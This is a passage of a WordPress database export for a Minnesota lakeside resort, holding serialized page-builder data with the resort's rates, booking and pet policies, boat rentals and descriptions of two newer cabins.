IS BEFORE 10:00AM<br />\nWe believe that Pets are part of the family so pets on a leash are welcome in all campsites ( 1 pet per campsite)  and some of the units ( 1 pet per unit where allowable).<br />\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1558293654929\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-82610002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:3;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-82610003\";}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(2482,827,'_wp_page_template','default'),(2483,827,'_elementor_edit_mode','builder'),(2484,827,'_elementor_template_type','post'),(2485,827,'_elementor_data','[{\"id\":\"86ecb3f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8a45f64\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"142d45e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3d072d4\"}]},\"elements\":[{\"id\":\"7e4ba31\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"84ad9d6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8aaa860\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"619f46d\"}]},\"elements\":[{\"id\":\"3a53155\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2018\\/04\\/20Foot.png\",\"id\":701},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1ab4587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">20 foot pontoon With 25 HP Yamaha 4 stroke Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"706d39a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"48d8414\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c530bfd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6edda1c\"}]},\"elements\":[{\"id\":\"9bcae90\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN2723.jpg\",\"id\":549},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"84b34fe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">14 foot Lund Fishing Boat with 15 HP Yamaha Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34966cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"80347fe\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"02046c5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1893353\"}]},\"elements\":[{\"id\":\"403ea9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b555a73\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ecce2ec\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"097b1aa\"}]},\"elements\":[{\"id\":\"d260d09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3711.jpg\",\"id\":494}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3529b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE USE OF THE PADDLE BOAT<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eefc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9de916f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"f334c4c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"75e0743\"}]},\"elements\":[{\"id\":\"991c5f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3841.jpg\",\"id\":497}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"340682a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LAUNCH ON SITE $10.00 ONE TIME CHARGE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99b8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"11b94d2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"da4d017\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"abd79ac\"}]},\"elements\":[{\"id\":\"795afe3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC04860.jpg\",\"id\":348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"11200cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE CANOE AND KAYAK USE TO ALL GUESTS<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36e1853\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"cbc097a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6c8184f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2ed5a11\"}]},\"elements\":[{\"id\":\"c1238f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a28b037\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"63eca3b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"13e791a\"}]},\"elements\":[{\"id\":\"a7630d3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3828.jpg\",\"id\":552}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"017271e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">RENT A PADDLE BOARD<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fb16710\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1ccf64d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4ce0da8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"db765d1\"}]},\"elements\":[{\"id\":\"c08c13b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSC0342.jpg\",\"id\":550}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"887e12c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LIFT RENTAL<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ad760a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"71b87fc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c7ff68d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d88c0cd\"}]},\"elements\":[{\"id\":\"e02420b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3462.jpg\",\"id\":551}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"87a5746\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">PLENTY OF BOAT SLIPS AVAILABLE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89ddcdd\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4802a00\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"94bd481\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d562f41\"}]},\"elements\":[{\"id\":\"bd63f53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"65bbf44\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c90a3a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d726c85\"}]},\"elements\":[{\"id\":\"c4fdd4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>You can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks or paddle boat<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2486,827,'_elementor_version','2.5.12'),(2489,828,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:2:\"id\";s:18:\"sow-editor-4310000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-82810000\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-82810001\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:958:\"<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875%  ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.  PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.<br />\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION.  ALL DEPOSITS ARE NON-REFUNDABLE.<br />\nCHECK IN TIME IS AFTER 3:00PM  <strong>NO</strong> EXCEPTIONS !! CHECK OUT TIME IS BEFORE 10:00AM, <strong>NO</strong> exceptions !!<br />\nWe believe that Pets are part of the family so pets on a leash are welcome in all campsites ( 1 pet per campsite)  and some of the units ( 1 pet per unit where allowable).<br />\nPlease do not bring firewood, if you live more than 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND.  CALL FOR WINTER RATES</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1558525890122\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-82810002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:3;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-82810003\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(2490,829,'_wp_page_template','default'),(2491,829,'_elementor_edit_mode','builder'),(2492,829,'_elementor_template_type','post'),(2493,829,'_elementor_version','2.5.15'),(2494,829,'_elementor_data','[{\"id\":\"50e917a\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b6ee1cc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c15ef20\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6364ee2\"}]},\"elements\":[{\"id\":\"25a144c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a1bbc9a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a12116a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74c336e\"}]},\"elements\":[{\"id\":\"e69cdee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u00a0<\\/h2><h3>Love to stay in a Newer Cabin \\u2013 <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us to book it 218-747-2959<\\/a><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"71c9c9f\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"daa79a5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8b7f04d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"02be74a\"}]},\"elements\":[{\"id\":\"91a0fc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5009976\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"cc92fdd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38976b4\"}]},\"elements\":[{\"id\":\"2dd3697\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>#13<\\/strong><\\/p><p>This is one of the newer cabins located on the swimming beach. It is a 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom. Enjoy looking over the lake sitting at the breakfast bar or on the deck. There is a full kitchen, central air conditioning and television. This unit is handicap accessible. This unit is No Smoking, no Pets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0de354b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"51563f4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a399b62\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c6ce686\"}]},\"elements\":[{\"id\":\"90da9a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bac4c3c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"691551b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a6da7ce\"}]},\"elements\":[{\"id\":\"5a1fef2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC05132-1.jpg\",\"id\":350}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05fe721\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"48b0790\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1dc779e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"10aea88\"}]},\"elements\":[{\"id\":\"4de5a2c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3937.jpg\",\"id\":378}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5333298\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"13c67c3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"12adb22\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e5ee1fc\"}]},\"elements\":[{\"id\":\"58909e0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3939.jpg\",\"id\":380}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f1d6275\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"94dfae0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1a806a0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"db0a78a\"}]},\"elements\":[{\"id\":\"d4a2c33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e2ad2df\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"169f623\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"94e664c\"}]},\"elements\":[{\"id\":\"24c7810\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3946.jpg\",\"id\":386}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"910371e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bc94767\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"12bcc27\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b3b5c83\"}]},\"elements\":[{\"id\":\"af9c607\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942.jpg\",\"id\":382}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ca993d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7307f5a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1e3851b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8d18dbc\"}]},\"elements\":[{\"id\":\"5cbedc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3938.jpg\",\"id\":379}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ac3587\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"66bd1f4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"eb116ed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6eb21bc\"}]},\"elements\":[{\"id\":\"98126ac\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"45ebf30\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"237e527\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e166c30\"}]},\"elements\":[{\"id\":\"6ad4744\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>#14<\\/strong><br \\/>Is also one of the newer cabins and is 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom.<br \\/>The deck over looks the lake and this cabin has a fire ring and patio. There is a full kitchen, central air conditioning and television.<br \\/>This is a No Smoking, no Pets unit. test<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"321d0a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2699905\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"50936de\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"93a9ddc\"}]},\"elements\":[{\"id\":\"3473758\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9a06343\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"46d7bbd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"596cd90\"}]},\"elements\":[{\"id\":\"0ebaaa5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/newCabin14.jpg\",\"id\":317}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"916a3db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1c96d80\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1dffc8b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1276762\"}]},\"elements\":[{\"id\":\"c80be6a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3941.jpg\",\"id\":381}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b322842\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"ba166f6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c21e44\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"83a5d56\"}]},\"elements\":[{\"id\":\"6189189\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942.jpg\",\"id\":382}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2496,830,'_elementor_edit_mode','builder'),(2497,830,'_elementor_template_type','post'),(2498,830,'_elementor_version','2.5.15'),(2499,830,'_wp_page_template','default'),(2500,830,'_elementor_data','[{\"id\":\"f523c97\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5af